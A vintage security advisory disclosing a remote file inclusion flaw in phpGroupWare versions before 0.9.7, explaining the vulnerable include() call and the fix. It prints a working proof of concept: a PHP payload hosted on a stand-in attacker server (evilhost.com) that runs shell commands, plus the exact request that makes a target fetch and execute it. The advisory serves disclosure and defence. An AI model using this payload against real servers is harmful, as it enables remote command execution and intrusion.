SRADV00006.txt

`=================================================  
Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006)  
http://www.securereality.com.au  
=================================================  
  
[Title]  
Remote command execution vulnerabilities in phpGroupWare  
  
[Released]  
6/11/2000  
  
[Vulnerable]  
Versions below 0.9.7 under Unix  
  
[Overview]  
phpGroupWare is a multi-user web based groupware suite written in PHP.  
phpGroupWare is quite popular due to its integration of many aspects of  
group cooperation: email, calendaring, file sharing, to do lists, etc.  
  
phpGroupWare makes insecure calls to the include() function of PHP which can  
allow the inclusion of remote files, and thereby the execution of arbitrary  
commands on the remote web server with the permissions of the web server  
user, usually 'nobody'  
  
[Impact]  
Remote command execution (with privileges as above)  
  
[Detail]  
This is an excellent example of another aspect of the remotely accessible  
include files issue that has been discussed in detail recently. The  
discussion has centered around the sensitive information that can be  
contained in include files and the fact that include files generally have  
the extension 'inc' and thus, if web accessible, are returned to the  
requestor in plain text.  
  
A common solution amongst freely available php scripts is to give include  
files the extension .inc.php. This causes the include file to always be  
processed by the PHP interpreter and therefore not return in plain text  
sensitive configuration information, like database passwords. Thus these  
programs can have easy installation (untar everything into the web space)  
without worrying about configuration disclosure.  
  
The problem however then becomes one of context. Code and configuration  
variables in include files tend to be highly interdependent, that is,  
certain files and data must have already been included before including a  
particular file. By directly requesting the files we can break the  
interdependence chain and cause data the include files could normally trust  
to become untrustworthy.  
  
Which leads us to the phpGroupWare vulnerability. We can directly request  
the library include files that make up the phpGroupWare API, one of these  
files, phpgw.inc.php performs an include based on variables that should have  
been set as part of the call chain. By providing them ourselves we can  
determine the initial part of the following include statement:  
  
include($phpgw_info["server"]["include_root"] .  
"/phpgwapi/phpgw_info.inc.php");  
  
By providing $phpgw_info[server][include_root] as a form variable that  
points to a remote web server on which we can place files, we can get the  
script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute  
it.  
  
For example, if I had access to place files in a webspace  
http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place  
inside it a script called phpgw_info.inc.php with content like the  
following:  
  
<?php  
  
// PHP code to be executed  
$phpcode = '  
echo("Hi there!<BR>");  
passthru("id");  
';  
  
// If we were called via remote include, send the code to be  
// executed  
if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")  
echo("<?php $phpcode ?>");  
else  
// Otherwise we're being executed on the target web server already,  
// so simply evaluate the code  
eval($phpcode);  
  
exit();  
  
?>  
  
(This script is designed so that the server it is placed on can be PHP  
enabled and not result in the code being executed on the attacking machine)  
  
If we then make a request to the target machine like the following:  
  
/phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=ht  
tp://evilhost.com/~shaun  
  
The code should be retrieved and executed.  
  
It should be noted there are some caveats to this attack:  
- The remote web server must be able to retrieve the file, i.e no firewalls  
in the way  
- The remote web server must not be running PHP under Windows since remote  
file includes are not supported on this platform  
- The remote web server must be running a sufficiently recent version of PHP  
that [][] form variables are allowed  
- The remote web server must not have allow_url_fopen set off  
- Later versions of phpGroupWare check the variable  
$phpgw_info["server"]["header_version"] in phpgw.inc.php, for those versions  
we need to provide that via form variables too  
  
There may well be others based on other versions/configurations of PHP.  
  
[Fix]  
Please upgrade to the latest version of phpGroupWare (0.9.7) at  
http://sourceforge.net/project/showfiles.php?group_id=7305  
  
[Acknowledgements]  
Our thanks to all of the developers of phpGroupWare, in particular Dan  
Kuykendall, for their assistance in quickly correcting this issue.  
  
[Disclaimer]  
Advice, directions and instructions on security vulnerabilities in this  
advisory do not constitute: an endorsement of illegal behavior; a guarantee  
that protection measures will work; an endorsement of any product or  
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is  
provided as is and Secure Reality Pty Ltd does not accept responsibility for  
any damage or injury caused as a result of its use.  
`